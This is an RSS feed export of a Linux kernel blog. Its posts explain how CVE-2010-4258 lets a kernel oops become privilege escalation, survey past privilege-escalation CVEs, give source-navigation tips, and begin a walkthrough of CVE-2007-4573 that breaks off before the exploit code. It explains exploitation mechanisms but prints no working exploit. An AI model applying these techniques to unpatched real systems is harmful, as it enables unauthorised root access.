<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Made of Bugs &#187; kernel</title>
	<atom:link href="http://blog.nelhage.com/tag/kernel/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.nelhage.com</link>
	<description>It's software. It's made of bugs.</description>
	<lastBuildDate>Thu, 18 Aug 2011 21:57:23 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>CVE-2010-4258: Turning denial-of-service into privilege escalation</title>
		<link>http://blog.nelhage.com/2010/12/cve-2010-4258-from-dos-to-privesc/</link>
		<comments>http://blog.nelhage.com/2010/12/cve-2010-4258-from-dos-to-privesc/#comments</comments>
		<pubDate>Fri, 10 Dec 2010 16:02:11 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[Computer Security]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[bugs]]></category>
		<category><![CDATA[cve]]></category>
		<category><![CDATA[full-nelson]]></category>
		<category><![CDATA[kernel]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=418</guid>
		<description><![CDATA[Dan Rosenberg recently released a privilege escalation bug for Linux, based on three different kernel vulnerabilities I reported recently. This post is about CVE-2010-4258, the most interesting of them, and, as Dan writes, the reason he wrote the exploit in the first place. In it, I&#8217;m going to do a brief tour of the various [...]]]></description>
			<content:encoded><![CDATA[<p>Dan Rosenberg recently <a href="http://thread.gmane.org/gmane.comp.security.full-disclosure/76457">released</a> a privilege escalation bug
for Linux, based on three different kernel vulnerabilities I reported
recently. This post is about CVE-2010-4258, the most interesting of them, and,
as Dan writes, the reason he wrote the exploit in the first place. In it, I&#8217;m
going to do a brief tour of the various kernel features that collided to make
this bug possible, and explain how they combine to turn an otherwise-boring oops
into privilege escalation.</p>

<h2><code>access_ok</code></h2>

<p>When a user application passes a pointer to the kernel, and the kernel
wants to read or write from that pointer, the kernel needs to perform
various checks that a buggy or malicious userspace app hasn&#8217;t passed
an &#8220;evil&#8221; pointer.</p>

<p>Because the kernel and userspace run in the same address space, the
most important check is simply that the pointer points into the
&#8220;userspace&#8221; part of the address space. User applications are protected
by page table permissions from writing into kernel memory, but the
kernel isn&#8217;t, and so must explicitly check that any pointers given to
it by a user don&#8217;t point into the kernel region.</p>

<p>The address space is laid out such that user applications get the
bottom portion, and the kernel gets the top, so this check is a simple
comparison against that boundary. The kernel function that performs
this check is called <code>access_ok</code>, although there are various other
functions that do the same check, implicitly or otherwise.</p>

<h2><code>get_fs()</code> and <code>set_fs()</code></h2>

<p>Occasionally, however, the kernel finds it useful to change the rules for what
<code>access_ok</code> will allow. <code>set_fs()</code><sup><a href="#fn.1" class="footnote" name="fnr.1">1</a></sup> is an internal Linux function that is used to
override the definition of the user/kernel split, for the current process.</p>

<p>After a <code>set_fs(KERNEL_DS)</code>, no checking is performed that user pointers
point to userspace &#8212; <code>access_ok</code> will always return
true. <code>set_fs(KERNEL_DS)</code> is mainly used to enable the kernel to wrap
functions that expect user pointers, by passing them pointers into the
kernel address space. A typical use reads something like this:</p>

<pre><code>old_fs = get_fs(); set_fs(KERNEL_DS);
vfs_readv(file, kernel_buffer, len, &amp;pos);
set_fs(old_fs);
</code></pre>

<p><code>vfs_readv</code> expects a user-provided pointer, so without the <code>set_fs()</code>, the
<code>access_ok()</code> inside <code>vfs_readv()</code> would fail on our kernel buffer, so we use
<code>set_fs()</code> to effectively temporarily disable that checking.</p>

<h2>Kernel oopses</h2>

<p>When the kernel oopses, perhaps because of a <code>NULL</code> pointer
dereference in kernelspace, or because of a call to the <code>BUG()</code> macro
to indicate an assertion failure, the kernel attempts to clean up, and
then tries to kill the current process by calling the <code>do_exit()</code>
function to exit the current process.</p>

<p>When the kernel does so, it&#8217;s still running in the same process
context it was before the oops occured, including any <code>set_fs()</code>
override, if applicable. Which means that <code>do_exit</code> will get called
with <code>access_ok</code> disabled &#8212; not something anyone expected when they
wrote the individual pieces of this system.</p>

<h2><code>clear_child_tid</code></h2>

<p>As it turns out, <code>do_exit</code> contains a write to a user-controlled
address that expects <code>access_ok</code> to be working properly!</p>

<p><code>clear_child_tid</code> is a feature where, on thread exit, the kernel can
be made to write a zero into a specified address in that thread&#8217;s
address space, in order to notify other threads of that exit.</p>

<p>This is implemented by simply storing a pointer to the to-be-zeroed
address inside <code>struct task_struct</code> (which represents a single thread
or process), and, on exit, <code>mm_release</code>, called from <code>do_exit</code>, does:</p>

<pre><code>put_user(0, tsk-&gt;clear_child_tid);
</code></pre>

<p>This is normally safe, because <code>put_user</code> checks that its second
argument falls into the &#8220;userspace&#8221; segment before doing a write. But,
if we are running with <code>get_fs() == KERNEL_DS</code>, it will happily accept
any address at all, even one pointing into kernel space.</p>

<p>So, if we find any kernel <code>BUG()</code> or <code>NULL</code> dereference, or other page
fault, that we can trigger after a <code>set_fs(KERNEL_DS)</code>, we can trick
the kernel into a user-controlled write into kernel memory!</p>

<h2><code>splice()</code> et. al.</h2>

<p>An obvious question at this point is: How much of the kernel can an
attacker cause to run with <code>get_fs() == KERNEL_DS</code>?</p>

<p>There are a number of small special cases. For example, the binary
sysctl compatibility code works by calling the normal <code>/proc/</code> write
handlers from kernelspace, under <code>set_fs()</code>. handful of compat-mode
(32 on 64) syscalls work similarly.</p>

<p>By far the biggest source I&#8217;ve found, however, is the <code>splice()</code>
system call. The <code>splice()</code> system call is a relatively recent
addition to Linux, and allows for zero-copy transfer of pages between
a pipe and another file descriptor.</p>

<p>As of 2.6.31, attempts to <code>splice()</code> to or from an fd that doesn&#8217;t
support special handling to actually do zero-copy <code>splice</code>, will fall
back on doing an ordinary <code>read()</code>, <code>write()</code>, or <code>sendmsg()</code> on the
fd &#8230; from the kernel, using set_fs() in order to pass in kernel
buffers.</p>

<p>What that means it that by using <code>splice()</code>, an attacker can call the
bulk of the code in most obscure filesystems and socket types (which
tend not to have explicit <code>splice()</code> support) with a segment override
in place. Conveniently for an attacker, that is also exactly a
description of where the bulk of the random security bugs tend to be.</p>

<p>This is also exactly the technique Dan&#8217;s exploit uses. He uses
CVE-2010-3849, an otherwise boring <code>NULL</code> pointer dereference I
reported in the Econet network protocol. His exploit code does a
<code>splice()</code> to an econet socket, causing the <code>econet_sendsmg</code> handler to
get called under <code>set_fs(KERNEL_DS)</code>. When it oopses, <code>do_exit</code> is
called, and he gets a user-controlled write into kernel
memory. Everything else is just details.</p>

<p><div id="footnotes">
<h2 class="footnotes">Footnotes: </h2>
<div id="text-footnotes">
<p class="footnote"><sup><a class="footnum" name="fn.1" href="#fnr.1">1</a></sup> Back in Linux 1.x, this function actually set the <tt>%fs</tt> register on i386. It hasn&#8217;t in years, but it&#8217;s used in too many places for changing the name to be worth it.</p>
</div></div></p>


]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2010/12/cve-2010-4258-from-dos-to-privesc/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>A brief look at Linux&#8217;s security record</title>
		<link>http://blog.nelhage.com/2010/09/a-brief-look-at-linuxs-security-record/</link>
		<comments>http://blog.nelhage.com/2010/09/a-brief-look-at-linuxs-security-record/#comments</comments>
		<pubDate>Mon, 27 Sep 2010 03:16:19 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[Computer Security]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[kernel]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=343</guid>
		<description><![CDATA[After the fuss of the last two weeks because of CVE-2010-3081 and CVE-2010-3301, I decided to take a look at a handful of the high-profile privilege escalation vulnerabilities in Linux from the last few years. So, here&#8217;s a summary of the ones I picked out. There are also a large number of smaller ones, like [...]]]></description>
			<content:encoded><![CDATA[<p>After the fuss of the last two weeks because of <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3081">CVE-2010-3081</a> and <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3301">CVE-2010-3301</a>, I decided to take a look at a handful of the high-profile privilege escalation vulnerabilities in Linux from the last few years.
</p>

<p></p><p>
So, here&#8217;s a summary of the ones I picked out. There are also a large number of smaller ones, like an <a href="http://sota.gen.nz/af_can/"><code>AF&#95;CAN</code></a> exploit, or the <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-1084">l2cap</a> overflow in the Bluetooth subsystem, that didn&#8217;t get as much publicity, because they were found more quickly or didn&#8217;t affect as many default configurations.
</p>
<table border="2" cellspacing="0" cellpadding="6" rules="groups" frame="hsides">
<col align="left"></col><col align="left"></col><col align="right"></col><col align="right"></col><col align="left"></col>
<thead>
<tr><th>CVE name</th><th>Nickname</th><th>introduced</th><th>fixed</th><th>notes</th></tr>
</thead>
<tbody>
<tr><td>CVE-2006-2451</td><td><code>prctl</code></td><td>2.6.13</td><td>2.6.17.4</td><td></td></tr>
<tr><td>CVE-2007-4573</td><td><code>ptrace</code></td><td>2.4.x</td><td>2.6.22.7</td><td>64-bit only</td></tr>
<tr><td>CVE-2008-0009</td><td><code>vmsplice</code> (1)</td><td>2.6.22</td><td>2.6.24.1</td><td></td></tr>
<tr><td>CVE-2008-0600</td><td><code>vmsplice</code> (2)</td><td>2.6.17</td><td>2.6.24.2</td><td></td></tr>
<tr><td>CVE-2009-2692</td><td><code>sock&#95;sendpage</code></td><td>2.4.x</td><td>2.6.31</td><td><code>mmap&#95;min&#95;addr</code> helped <sup><a class="footref" name="fnr.1" href="#fn.1">1</a></sup></td></tr>
<tr><td>CVE-2010-3081</td><td><code>compat&#95;alloc&#95;user&#95;space</code></td><td>2.6.26<sup><a class="footref" name="fnr.2" href="#fn.2">2</a></sup></td><td>2.6.36</td><td></td></tr>
<tr><td>CVE-2010-3301</td><td><code>ptrace</code> (redux)</td><td>2.6.27</td><td>2.6.36</td><td>64-bit only</td></tr>
</tbody>
</table>

<p>
I&#8217;ll probably have some more to say about these bugs in the future, but here&#8217;s a few thoughts:
</p>

<p><ul>
<li>
At least two of these bugs existed since the 2.4 days. So no matter what kernel you&#8217;ve been running, you had privilege escalation bugs you didn&#8217;t know about for as long as you were running that kernel. We don&#8217;t know whether or not the blackhats knew about them, but are you feeling lucky?
</li>
<li>
I bet there are at least a few more privesc bugs dating back to 2.4 we haven&#8217;t found yet.
</li>
<li>
If you run a Linux machine with untrusted local users, or with services that are at risk of being compromised (e.g. your favorite shitty PHP webapp), you&#8217;d better have a story for how you&#8217;re dealing with these bugs. Including the fact that some of these were privately known for years before they were announced.
</li>
<li>
It&#8217;s not clear from this sample that the kernel is getting more secure over time. I suspect we&#8217;re getting better at finding bugs, particularly now that companies like Google are paying researchers to audit the kernel, but it&#8217;s not obvious we&#8217;re getting better at not introducing them in the first place. Certainly CVE-2010-3301 is pretty embarrassing, being a reintroduction of a bug that had been fixed seven months previously.
</li>
</ul></p>

<div id="footnotes">
<h2 class="footnotes">Footnotes: </h2>
<div id="text-footnotes">
<p class="footnote"><sup><a class="footnum" name="fn.1" href="#fnr.1">1</a></sup> <code>mmap_min_addr</code> mitigated this bug to a DoS, but several bugs that allowed attackers to get around that restriction were announced at the same time.
</p>
<p class="footnote"><sup><a class="footnum" name="fn.2" href="#fnr.2">2</a></sup> The public exploit relies on a call path introduced in 2.6.26, but observers have pointed out <a href="http://www.webhostingtalk.com/showpost.php?p=7026467&#038;postcount=192">the possibility</a> of exploit vectors affecting older kernels.
</p>
</div>
</div>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2010/09/a-brief-look-at-linuxs-security-record/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Navigating the Linux Kernel</title>
		<link>http://blog.nelhage.com/2010/08/navigating-the-linux-kernel/</link>
		<comments>http://blog.nelhage.com/2010/08/navigating-the-linux-kernel/#comments</comments>
		<pubDate>Mon, 16 Aug 2010 01:52:58 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[linux]]></category>
		<category><![CDATA[kernel]]></category>
		<category><![CDATA[source-diving]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=291</guid>
		<description><![CDATA[In response to my query last time, ezyang asked for any tips or tricks I have for finding my way around the Linux kernel. I&#8217;m not sure I have much in the way of systematic advice for tracking down the answers to questions about the Linux kernel, but thinking about what I do when posed [...]]]></description>
			<content:encoded><![CDATA[<p>In response to my query last time, <code>ezyang</code> <a href="http://blog.nelhage.com/2010/08/suggestion-time-what-should-i-blog-about/#comment-2597">asked</a> for any
tips or tricks I have for finding my way around the Linux kernel. I&#8217;m
not sure I have much in the way of systematic advice for tracking down
the answers to questions about the Linux kernel, but thinking about
what I do when posed with a patch to Linux that I need understand, or
question I need to answer, I&#8217;ve come up with a collection of tips that
will hopefully be helpful to others looking to source-dive Linux for
whatever reason.</p>

<h2>Know the layout</h2>

<p>It sounds basic, but you probably shouldn&#8217;t be doing any serious
source-diving into the Linux kernel without pausing to familiarize
yourself with the basic layout of the kernel sources. The most
interesting directories are:</p>

<ul>
<li><p><code>fs/</code> &#8212; This directory contains both the VFS implementation (the
generic filesystem code and the top-level implementation of
filesystem syscalls), and specific filesystems, in
subdirectories. If you&#8217;re looking for the implementation of a
filesystem-related system call, it&#8217;s probably in one of <code>fs/*.c</code>.</p></li>
<li><p><code>mm/</code> &#8212; This contains the virtual memory and memory management
subsystems. <code>mmap</code> lives here, as do all of the kernel&#8217;s various
memory allocators, including <code>kmalloc</code> and <code>vmalloc</code>.</p></li>
<li><p><code>kernel/</code> &#8212; This contains the &#8220;core&#8221; kernel code. The scheduler
lives here, as does the implementation of various primitives used
throughout the kernel, like <code>printk</code> and various data
structures. timer- and process- related system calls live here,
including <code>fork</code> and <code>exit</code>, and most anything related to uids and
pids.</p></li>
<li><p><code>net/</code> is the networking subsystem; much like <code>fs/</code> it contains both
generic code and specific network protocol
implementations. networking-related system calls are mostly in
<code>net/socket.c</code></p></li>
<li><p><code>arch/</code> &#8212; Architecture-specific code lives here, in
<code>arch/ARCHITECTURE/</code>. Per-architecture include files live in
<code>arch/ARCHITECTURE/include/asm/</code>; Prior to 2.6.28 they were in
<code>include/asm-ARCH/</code>. <code>arch/</code> directories tend to loosely parallel
the top-level source directory, with <code>kernel/</code> and <code>mm/</code>
subdirectories.</p></li>
</ul>

<h2>Know your git</h2>

<p>I find <code>git</code> is one of the most invaluable tools at my disposal when
trying to understand the Linux source. There are large classes of
questions about the source that git makes it easy to answer that I
otherwise would have to resort to something much slower or more
cumbersome to figure out. Some things I&#8217;ve found particularly useful
include:</p>

<ul>
<li><p><code>git grep</code> &#8212; <code>git grep</code> works almost identically to <code>grep</code>, but
instead of searching the files on disk, it searches the objects in
git&#8217;s object store. Because of the way this store is compressed and
designed for locality, it&#8217;s typically far faster at searching large
trees than the equivalent recursive grep would be. In addition, it
knows to ignore files that aren&#8217;t in source control, such as object
files.</p></li>
<li><p><code>git blame</code> &#8212; This one should be familiar to anyone who&#8217;s used
subversion or most any other version control system. This will let
you quickly find the commit that introduced a given line. This gives
you several potential sources of information:</p>

<ul>
<li>The commit message often includes helpful documentation on how a
change was supposed to work or what the bug it was fixing was.</li>
<li>The diff is often a quick way to find other files that are related
to the piece of code you&#8217;re looking at, potentially giving you
other places to look for more related code.</li>
</ul></li>
<li><p><code>git log -S</code> &#8212; while <code>git blame</code> can tell you when a specific line
was introduced, <code>git log -S</code>, also known for some inscrutable reason
as the &#8220;pickaxe&#8221;, will let you know when a specific chunk of code
was introduced. Here&#8217;s how it works:</p>

<p>Suppose I wanted to know when the <code>vmsplice</code> system call was
introduced. A <code>git grep</code> will reveal the line in <code>fs/splice.c</code> that
defines the system call:</p>

<pre><code>SYSCALL_DEFINE4(vmsplice, int, fd, const struct iovec __user *, iov,
                unsigned long, nr_segs, unsigned int, flags)
</code></pre>

<p>I could run <code>git blame</code>, but that points me at commit <code>836f92ad</code>,
which was just one of the commits that introduced the
<code>SYSCALL_DEFINEn</code> wrappers, which isn&#8217;t what I&#8217;m looking for. I
could continue <code>git blame</code>ing from there, but that&#8217;s really not what
I want.</p>

<p>Instead, I can run:</p>

<pre><code>git log -Svmsplice fs/splice.c
</code></pre>

<p>which yields two commits, the earliest of which is the one I want.</p>

<p>So, how does this work? When you use the pickaxe, with <code>-Sstring</code>,
git looks for commits that <em>add</em> or <em>remove</em> an instance of
<strong>string</strong>. It doesn&#8217;t look at the diff or anything &#8212; it simply
counts how often <strong>string</strong> appears before and after the commit, and
includes commits where the numbers are different.</p>

<p>So, <code>836f92ad</code>, which has the hunk:</p>

<pre><code>-asmlinkage long sys_vmsplice(int fd, const struct iovec __user *iov,
-                            unsigned long nr_segs, unsigned int flags)
+SYSCALL_DEFINE4(vmsplice, int, fd, const struct iovec __user *, iov,
+               unsigned long, nr_segs, unsigned int, flags)
</code></pre>

<p>doesn&#8217;t change the count of <code>vmsplice</code> instances, and isn&#8217;t flagged
by the pickaxe. But the commit that introduced <code>sys_vmsplice</code> in the
first place had to have, and so the pickaxe flags it.</p></li>
</ul>

<h2>Know your idioms</h2>

<p>One of the advantages of the centrally-controlled model of Linux,
where almost all changes, at least to the core code, are code-reviewed
extensively on the <a href="http://lkml.org/">LKML</a>, is that the code tends to have a very
high standard of stylistic and idiomatic consistency. So once you
learn some of the common idioms of kernel development, you can
recognize them everywhere, and infer information about the structure
of a piece of code without having to go read all of the details.</p>

<p>A corollary that I&#8217;ve found here is: Trust your instincts. If you
think you recognize a pattern in the code, or if there is some way in
which it seems like the code &#8220;ought to be working&#8221;, you&#8217;re usually
well served by assuming that your hunch is right and proceeding based
off of that, and coming back later to check your assumptions if
necessary, instead of stopping at every stop to verify your
guesses. Because the code is, in general, of very high quality and
consistency, once you start developing familiarity with it, your
guesses will be right far more often than not.</p>

<p>I won&#8217;t attempt to list an exhaustive list of design patterns and
idioms in the Linux kernel, but here are some it&#8217;s pretty essential to
be familiar with:</p>

<ul>
<li><p>The <code>_ops</code> struct &#8212; Linux uses an OO-esque style ubiquitously in
the kernel, where structs of function pointers (basically a
poor-man&#8217;s <code>vtable</code>, to you C++ programmers), are passed around and
stored to indicate how to work with some object. These <code>struct</code>s are
known as &#8220;ops&#8221; structures, and typically have types name
<code>FOO_operations</code>, and live in variables named <code>SOMETHING_ops</code> &#8211;
<code>struct super_operations</code>, <code>struct inode_operations</code>, <code>struct
file_operations</code>, and so on.</p></li>
<li><p><code>struct list_head</code>, defined in <code>include/linux/types.h</code>, with
operations in <code>include/linux/list.h</code> is used basically anywhere the
kernel needs to store linked lists. To save on space and reduce
fragmentation, the kernel uses a trick where <code>struct list_head</code>s are
stored inside the structures that are the element of a list, and
pointer arithmetic is used to compute the one from the
other. Familiarize yourself with <code>list.h</code>, since it&#8217;s a rare piece
of code that won&#8217;t use at least some of its functionality.</p></li>
<li><p><code>container_of</code> and related idioms. The trick I mentioned previously,
of storing a <code>list_head</code> inside a structure and using pointer
arithmetic, is generalized in many places, through the
<code>container_of</code> macro.</p>

<p>Let&#8217;s consider the problem of implementing a filesystem, say,
<code>ext2</code>. Linux&#8217;s VFS layer has a generic <code>inode</code> structure, that
store filesystem-independent information about inodes. <code>ext2</code>,
however, has some additional information it needs to store on each
in-memory inode. A standard userspace approach would be for <code>struct
inode</code> to contain a <code>void *userdata</code> pointer, and <code>ext2</code> could
allocate a <code>struct ext2_inode_info</code>, and point <code>userdata</code> at that.</p>

<p>This means that creating an inode needs two allocations, however,
which is inefficient and causes fragmentation in the memory
allocator, which is unacceptable in the kernel.</p>

<p>Instead, ext2 embeds the <code>struct inode</code> <em>inside</em> <code>struct
ext_inode_info</code>:</p>

<pre><code>/*
 * second extended file system inode data in memory
 */
struct ext2_inode_info {
        __le32  i_data[15];
        …
        struct inode    vfs_inode;
        …
};
</code></pre>

<p>(See <code>fs/ext2/ext2.h</code> for the full definition)</p>

<p>Then, whenever ext2 gets a callback from the VFS with a <code>struct
inode</code>, it can retrieve the <code>ext2_inode_info</code> using:</p>

<pre><code>static inline struct ext2_inode_info *EXT2_I(struct inode *inode)
{
        return container_of(inode, struct ext2_inode_info, vfs_inode);
}
</code></pre>

<p>This uses the <code>container_of</code> macro, which in this case is used to
find the object of type <code>ext2_inode_info</code> which contains the object
<code>inode</code> in the member named <code>vfs_inode</code>. The implementation of this
macro is somewhat hairy and relies on GCC extensions when available,
but you should be able to see that in the end it will compile down
to a simple subtraction &#8212; about as efficient as you could hope for.</p></li>
</ul>

<h2>Know your references</h2>

<p>While sourcediving is the ultimate way to answer any question about
the kernel, and is lots of fun to boot, don&#8217;t forget about the
possibility of documentation answering your question, or at least
pointing you in the right direction. Some places that are essential to
look include:</p>

<ul>
<li><p><a href="http://oreilly.com/catalog/9780596005658"><em>Understanding the Linux Kernel</em></a> &#8212; This book is an
incredibly detailed walkthrough of the inner implementation of
virtually every feature and subsystem in the kernel, as of version
2.6.11. It&#8217;s starting to show its age in some places, but it&#8217;s still
largely quite accurate, and is an essential guide to anyone who&#8217;s
serious about, well, understanding the Linux kernel.</p></li>
<li><p><a href="http://lwn.net/">LWN</a> &#8212; LWN (Linux Weekly News) is an excellent publication,
and anyone who hacks on Linux or cares about its development is
well-advised to subscribe. Rarely does a new feature go into Linux
without an incredibly detailed writeup on LWN, including the history
of the feature, details of its development, and a low-level
explanation of how it works and its APIs.</p>

<p>Even without a subscription, old articles are all freely available,
and you&#8217;re well-advised to search LWN&#8217;s <a href="http://lwn.net/Kernel/Index/">kernel index</a>
for anything applicable to your problem.</p></li>
<li><p>The LKML &#8212; The Linux Kernel Mailing List is where almost all the
action happens in the Linux development community. Few features go
in without being hotly debated on this mailing list, and discussions
often lend useful insight into the design and implementation of the
feature in question.</p>

<p>Because patches tend to be submitted to the LKML by email, a good
first step to trying to find discusion on a specific patch is just
to plug its subject (the first line of the commit message) into
Google or your favorite LKML archive&#8217;s search engine.</p></li>
</ul>

<p>Well, this has been quite the braindump. I hope this turns out to be
useful to someone, and please comment if you have other advice or
resources you recommend for getting into the Linux source code.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2010/08/navigating-the-linux-kernel/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>CVE-2007-4573: The Anatomy of a Kernel Exploit</title>
		<link>http://blog.nelhage.com/2010/02/cve-2007-4573-the-anatomy-of-a-kernel-exploit/</link>
		<comments>http://blog.nelhage.com/2010/02/cve-2007-4573-the-anatomy-of-a-kernel-exploit/#comments</comments>
		<pubDate>Sat, 06 Feb 2010 03:32:31 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[Computer Security]]></category>
		<category><![CDATA[C]]></category>
		<category><![CDATA[cve]]></category>
		<category><![CDATA[exploits]]></category>
		<category><![CDATA[kernel]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=99</guid>
		<description><![CDATA[CVE-2007-4573 is two years old at this point, but it remains one of my favorite vulnerabilities. It was a local privilege-escalation vulnerability on all x86_64 kernels prior to v2.6.22.7. It&#8217;s very simple to understand with a little bit of background, and the exploit is super-simple, but it&#8217;s still more interesting than Yet Another NULL Pointer [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4573">CVE-2007-4573</a>
is two years old at this point, but it remains one of my favorite
vulnerabilities. It was a local privilege-escalation vulnerability on
all <code>x86_64</code> kernels prior to <code>v2.6.22.7</code>. It&#8217;s very simple to
understand with a little bit of background, and the exploit is
super-simple, but it&#8217;s still more interesting than Yet Another NULL
Pointer Dereference. Plus, it was the first kernel bug I wrote an
exploit for, which was fun.</p>

<p>In this post, I&#8217;ll write up my exploit for CVE-2007-4573, and try to
give enough background for someone with some experience with C, Linux,
and a bit of x86 assembly to understand what&#8217;s going on. If you&#8217;re an
experienced kernel hacker, you probably won&#8217;t find much new here, but
if you&#8217;re not, hopefully you&#8217;ll get a sense for some of the pieces
that go into a kernel exploit.</p>

<h2>The patch</h2>

<p>I&#8217;ll start out with the patch, or rather a slightly simplified
version, that omits some hunks that will be irrelevant for my
discussion. Then I&#8217;ll explain the context for the patch, and by that
point we&#8217;ll have enough context to understand the exploit code.</p>

<p>A simplified version of the patch follows (The original is
<a href="http://git.kernel.org/linus/176df2457ef6207156ca1a40991c54ca01fef567"><code>176df245</code></a>
in linus&#8217;s git repository) Note that this patch was applied to v2.6.22
&#8211; These files have moved around, so pull out an older kernel if
you&#8217;re trying to follow along at home:</p>

<pre><code>--- a/arch/x86_64/ia32/ia32entry.S
+++ b/arch/x86_64/ia32/ia32entry.S
@@ -38,6 +38,18 @@
        movq    %rax,R8(%rsp)
        .endm

+       .macro LOAD_ARGS32 offset
+       movl \offset(%rsp),%r11d
+       movl \offset+8(%rsp),%r10d
+       movl \offset+16(%rsp),%r9d
+       movl \offset+24(%rsp),%r8d
+       movl \offset+40(%rsp),%ecx
+       movl \offset+48(%rsp),%edx
+       movl \offset+56(%rsp),%esi
+       movl \offset+64(%rsp),%edi
+       movl \offset+72(%rsp),%eax
+       .endm
@@ -334,7 +346,7 @@ ia32_tracesys:
        movq $-ENOSYS,RAX(%rsp) /* really needed? */
        movq %rsp,%rdi        /* &amp;pt_regs -&gt; arg1 */
        call syscall_trace_enter
-       LOAD_ARGS ARGOFFSET  /* reload args from stack in case ptrace changed it */
+       LOAD_ARGS32 ARGOFFSET  /* reload args from stack in case ptrace changed it */
        RESTORE_REST
        jmp ia32_do_syscall
 END(ia32_syscall)
</code></pre>

<p>The patch defines the <code>IA32_LOAD_ARGS</code> macro, and replaces <code>LOAD_ARGS</code>
with it in several places (I&#8217;ve only shown one for
simplicity). <code>LOAD_ARGS32</code> differs only slightly from the <code>LOAD_ARGS</code>
macro that it is replacing, which is defined in
<code>include/asm-x86_64/calling.h</code>:</p>

<pre><code>.macro LOAD_ARGS offset
movq \offset(%rsp),%r11
movq \offset+8(%rsp),%r10
movq \offset+16(%rsp),%r9
movq \offset+24(%rsp),%r8
movq \offset+40(%rsp),%rcx
movq \offset+48(%rsp),%rdx
movq \offset+56(%rsp),%rsi
movq \offset+64(%rsp),%rdi
movq \offset+72(%rsp),%rax
.endm
</code></pre>

<p>As the name suggests, <code>LOAD_ARGS32</code> loads the registers from the stack
as 32-bit values, rather than 64-bit. Importantly, in doing so it
takes advantage of a quirk in the <code>x86_64</code> architecture, that causes
the top 32 bits of the registers to be zeroed if you write to the
32-bit versions. <code>LOAD_ARGS32</code> thus zero-extends the 32-bit values it
loads into the 64-bit registers.</p>

<h2>System call handling</h2>

<p>So, why is this patch so important? Let&#8217;s look at the context for the
<code>LOAD_ARGS</code> → <code>LOAD_ARGS32</code> change. <code>ia32entry.S</code> contains the
definitions for entry-points for 32-bit compatibility-mode system
calls on an <code>x86_64</code> processor. In other words, for 32-bit processes
running on the 64-bit machine, or for 64-bit processes that use
old-style <code>int $0x80</code> system calls for whatever reason.</p>

<p>There are three entry points in the file, one for 32-bit <code>SYSCALL</code>
instructions, one for 32-bit <code>SYSENTER</code>, and one for <code>int $0x80</code>. They
are all very similar, and we will only consider the <code>int $0x80</code> case
here. At boot-time, Linux configures the processor so that <code>int $0x80</code>
will dispatch to the <code>ia32_syscall</code> entry point. Ignoring a bunch of
debugging information, tracing, and other junk, this entry point&#8217;s
code is essentially simple:</p>

<pre><code>ENTRY(ia32_syscall)
        movl %eax,%eax

        pushq %rax
        SAVE_ARGS 0,0,1

        GET_THREAD_INFO(%r10)
        orl   $TS_COMPAT,TI_status(%r10)
        testl $_TIF_WORK_SYSCALL_ENTRY,TI_flags(%r10)
        jnz ia32_tracesys

        cmpl $(IA32_NR_syscalls-1),%eax
        ja ia32_badsys

ia32_do_call:
        IA32_ARG_FIXUP
        call *ia32_sys_call_table(,%rax,8)

        movq %rax,RAX-ARGOFFSET(%rsp)
        jmp int_ret_from_sys_call
</code></pre>

<p><code>%eax</code>, according to Linux&#8217;s syscall convention, stores the syscall number. The <code>mov</code> zero-extends it into <code>%rax</code>, and then we save it and the syscall arguments onto the stack.</p>

<p>The next block retrieves the <code>struct thread_info</code> for the current task,  sets the <code>TS_COMPAT</code> status bit to indicate that we&#8217;re handling a 32-bit compatibility mode syscall, and then
checks the thread&#8217;s flags to determine whether this thread has been flagged for extra processing on syscall entry. If so, we jump away to
code to handle that work.</p>

<p>Next (at the <code>cmpl</code>), we check to make sure that the requested syscall is in-bounds, and branch to an error path if not.</p>

<p><code>IA32_ARG_FIXUP</code> is a simple macro that moves registers around to
translate between the Linux syscall calling convention and the
<code>x86_64</code> calling convention, which each hold arguments in different
registers. Once we&#8217;ve fixed up the registers, the <code>call</code> instruction indexes the system call table by the system call number, looks up the address stored there, and calls into it to dispatch the syscall.</p>

<p>Finally, we save the return code from the system call into the register area on the stack, and jump to code to handle the return to userspace.</p>

<hr />

<p>One thing we should notice about this code is that when we
check that the syscall is in bounds, we compare against the 32-bit
<code>%eax</code> register, but when we actually dispatch the syscall, we use
the full 64 bits in <code>%rax</code>. The <code>movl</code> at the top of the function serves to zero-extend <code>%eax</code>, so that normally, the top 32 bits of <code>%rax</code> are zero, and this distinction doesn&#8217;t matter.</p>

